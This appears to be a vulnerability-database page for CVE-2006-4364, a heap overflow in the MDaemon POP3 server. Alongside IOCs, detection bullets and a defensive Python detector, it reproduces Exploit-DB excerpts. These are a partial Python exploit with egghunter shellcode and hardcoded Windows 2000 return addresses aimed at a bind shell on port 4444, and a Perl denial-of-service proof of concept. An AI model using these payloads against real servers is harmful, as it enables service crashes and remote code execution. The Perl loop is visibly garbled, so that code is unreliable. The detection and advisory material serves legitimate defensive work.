CVE-2006-4364
Published 2006-08-27
Priority: P343. CVSS 2.0: 5 (medium), vector AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 54.62% (98.9th percentile)
Multiple heap-based buffer overflows in the POP3 server in Alt-N Technologies MDaemon before 9.0.6 allow remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via long strings that contain '@' characters in the (1) USER and (2) APOP commands.
Affected
44 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alt-n | mdaemon | — | — |
Detection & IOCs (extracted from sources)
command: `USER @A@A` followed by 326 B's - heap overflow trigger via USER command with @ characters
bytes:
egghunter: \xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3
bytes:
egg tag: \x90\x90\x74\x30\x30\x77\x74\x30\x30\x77 (t00wt00w)
- Detect heap overflow attempts against MDaemon POP3 server via USER command containing repeated '@' characters; a long USER argument with '@' is the primary attack signature for CVE-2006-4364.
- Alert on POP3 USER commands exceeding normal length thresholds (e.g., >160 repetitions of '@A') on TCP port 110 targeting MDaemon.
- Detect the egghunter tag 't00wt00w' (bytes \x74\x30\x30\x77\x74\x30\x30\x77) in POP3 USER command payloads as an indicator of the exploit shellcode stage.
- Monitor for bind-shell connections on port 4444 originating from the MDaemon process following exploitation.
- Repeated rapid TCP connections to port 110 in a loop (e.g., 5+ connections in quick succession) sending oversized USER commands may indicate exploit looping behavior.
- The RET and UEH gadget addresses are specific to Windows 2000 SP4 with no patches applied; these hardcoded addresses will not work on other OS versions or patch levels.
- The exploit targets MDaemon versions prior to 9.0.6; systems running 9.0.6 or later are not vulnerable.
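The first three detection points above can be combined into one check over captured client-to-server POP3 lines. This is an added example, not code from the advisory or the indexed exploits; the thresholds `MAX_ARG_LEN` and `MAX_AT_SIGNS`, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed thresholds (not from the advisory); tune to the longest legitimate login.
MAX_ARG_LEN = 128
MAX_AT_SIGNS = 1
EGG_TAG = b"t00wt00w"  # egghunter tag from the IOC list above
CMD_RE = re.compile(rb"^(USER|APOP)[ \t]+(.*)$", re.IGNORECASE | re.DOTALL)


def inspect_pop3_line(line: bytes) -> list[str]:
    """Return the reasons one client-to-server POP3 line is suspicious."""
    reasons = []
    if EGG_TAG in line:
        reasons.append("egg-tag")
    match = CMD_RE.match(line.rstrip(b"\r\n"))
    if match:
        arg = match.group(2)
        if len(arg) > MAX_ARG_LEN:
            reasons.append("oversized-argument")
        if arg.count(b"@") > MAX_AT_SIGNS:
            reasons.append("repeated-at")
    return reasons


def scan(lines):
    """Return (line_number, command, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = inspect_pop3_line(line)
        if reasons:
            command = line.split(None, 1)[0].upper().decode("ascii", "replace")
            hits.append((number, command, reasons))
    return hits


# Constructed sample traffic: two normal logins, the two USER shapes
# described on this page, an unrelated command, and a line with the egg tag.
SAMPLE = [
    b"USER alice@example.com\r\n",
    b"APOP bob@example.com c4c9334bac560ecc979e58001b3e22fb\r\n",
    b"USER " + b"@A" * 160 + b"\r\n",
    b"USER @A@A" + b"B" * 326 + b"\r\n",
    b"LIST\r\n",
    b"user xt00wt00w\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The check only sees cleartext POP3 on port 110; for TLS-wrapped sessions it has to run where the traffic is decrypted or on the server's own command log.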
No detection rules found.
Exploit-DB
Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow
exploitdb·2006-08-26
CVE-2006-4364 Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow
```python
# Alt-N MDaemon POP3 Server nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff
```
Exploit-DB
MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2006-08-22
CVE-2006-4364 MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)
```perl
# MDaemon POP3 Server
# Infigo IS
#
#
$host = '192.168.0.105';
use IO::Socket;
for ($x = 0 ; $x $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A" x 160 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "QUIT\r\n";
recv ($sock, $var, 10000,0);
print $var;
close ($sock);
sleep(1);
}
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\'A" x 337 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
sleep(2);
# milw0rm.com [2006-08-22]
```
No writeups or analysis indexed.
- http://files.altn.com/MDaemon/Release/RelNotes_en.txt
- http://secunia.com/advisories/21595
- http://securityreason.com/securityalert/1446
- http://securitytracker.com/id?1016729
- http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04
- http://www.osvdb.org/28125
- http://www.securityfocus.com/archive/1/444015/100/0/threaded
- http://www.securityfocus.com/bid/19651
- http://www.vupen.com/english/advisories/2006/3361
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28517
- https://www.exploit-db.com/exploits/2245